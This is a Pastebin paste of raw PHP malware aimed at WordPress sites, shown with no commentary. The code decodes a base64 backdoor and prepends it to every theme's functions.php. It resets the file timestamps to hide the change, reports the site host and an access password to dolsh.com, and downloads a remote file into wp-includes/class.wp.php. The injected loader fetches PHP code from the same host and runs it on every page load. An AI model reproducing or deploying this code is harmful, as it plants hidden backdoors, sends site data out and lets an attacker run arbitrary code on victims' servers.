Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- error_reporting(0);
- ini_set('display_errors', 0);
- $install_code = 'PD9waHANCg0KaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkNCgl7DQokZGl2X2NvZGVfbmFtZT0id3BfdmNkIjsNCgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQ0KCQkJew0KDQoJCQkJDQoNCg0KDQoNCgkJCQljYXNlICdjaGFuZ2VfZG9tYWluJzsNCgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQ0KCQkJCQkJew0KCQkJCQkJCQ0KCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpDQoJCQkJCQkJCXsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmICgkZmlsZSA9IEBmaWxlX2dldF9jb250ZW50cyhfX0ZJTEVfXykpDQoJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmKHByZWdfbWF0Y2hfYWxsKCcvXCR0bXBjb250ZW50ID0gQGZpbGVfZ2V0X2NvbnRlbnRzXCgiaHR0cDpcL1wvKC4qKVwvY29kZTEwXC5waHAvaScsJGZpbGUsJG1hdGNob2xkZG9tYWluKSkNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB7DQoNCgkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRmaWxlID0gcHJlZ19yZXBsYWNlKCcvJy4kbWF0Y2hvbGRkb21haW5bMV1bMF0uJy9pJywkX1JFUVVFU1RbJ25ld2RvbWFpbiddLCAkZmlsZSk7DQoJCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBAZmlsZV9wdXRfY29udGVudHMoX19GSUxFX18sICRmaWxlKTsNCgkJCQkJCQkJCSAgICAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ICJ0cnVlIjsNCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB9DQoNCg0KCQkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0NCgkJCQkJCQkJfQ0KCQkJCQkJfQ0KCQkJCWJyZWFrOw0KDQoJCQkJDQoJCQkJDQoJCQkJZGVmYXVsdDogcHJpbnQgIkVSUk9SX1dQX0FDVElPTiBXUF9WX0NEIFdQX0NEIjsNCgkJCX0NCgkJCQ0KCQlkaWUoIiIpOw0KCX0NCg0KCQ0KDQoNCmlmICggISBmdW5jdGlvbl9leGlzdHMoICd0aGVtZV90ZW1wX3NldHVwJyApICkgeyAgDQokcGF0aD0kX1NFUlZFUlsnSFRUUF9IT1NUJ10uJF9TRVJWRVJbUkVRVUVTVF9VUkldOw0KaWYgKCAhIGlzXzQwNCgpICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd3cC1jcm9uLnBocCcpID09IGZhbHNlICYmIHN0cmlwb3MoJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10sICd4bWxycGMucGhwJykgPT0gZmFsc2UpIHsNCg0KaWYoJHRtcGNvbnRlbnQgPSBAZmlsZV9nZXRfY29udGVudHMoImh0dHA6Ly93d3cuZG9sc2guY29tL2NvZGUxMC5waHA/aT0iLiRwYXRoKSkNCnsNCg0KDQpmdW5jdGlvbiB0aGVtZV90ZW1wX3NldHVwKCRwaHBDb2RlKSB7DQogICAgJHRtcGZuYW1lID0gdGVtcG5hbShzeXNfZ2V0X3RlbXBfZGlyKCksICJ0aGVtZV90ZW1wX3NldHVwIik7DQogICAgJGhhbmRsZSA9IGZvcGVuKCR0bXBmbmFtZSwgIncrIik7DQogICAgZndyaXRlKCRoYW5kbGUsICI8P3BocFxuIiAuICRwaHBDb2RlKTsNCiAgICBmY2xvc2UoJGhhbmRsZSk7DQogICAgaW5jbHVkZSAkdG1wZm5hbWU7DQogICAgdW5saW5rKCR0bXBmbmFtZSk7DQogICAgcmV0dXJuIGdldF9kZWZpbmVkX3ZhcnMoKTsNCn0NCg0KZXh0cmFjdCh0aGVtZV90ZW1wX3NldHVwKCR0bXBjb250ZW50KSk7DQp9DQp9DQp9DQoNCg0KDQo/Pg==';
- $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
- $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
- $themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
- $ping = true;
- $ping2 = false;
- if ($list = scandir( $themes ))
- {
- foreach ($list as $_)
- {
- if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
- {
- $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
- if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
- {
- if (strpos($content, 'WP_V_CD') === false)
- {
- $content = $install_code . $content ;
- @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
- touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
- }
- else
- {
- $ping = false;
- }
- }
- }
- else
- {
- $list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
- foreach ($list2 as $_2)
- {
- if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
- {
- $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
- if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
- {
- if (strpos($content, 'WP_V_CD') === false)
- {
- $content = $install_code . $content ;
- @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
- touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
- $ping2 = true;
- }
- else
- {
- //$ping = false;
- }
- }
- }
- }
- }
- }
- if ($ping) {
- $content = @file_get_contents('http://www.dolsh.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
- @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.dolsh.com/admin.txt'));
- }
- if ($ping2) {
- $content = @file_get_contents('http://www.dolsh.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
- @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.dolsh.com/admin.txt'));
- //echo ABSPATH . 'wp-includes/class.wp.php';
- }
- }
- ?><?php error_reporting(0);?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement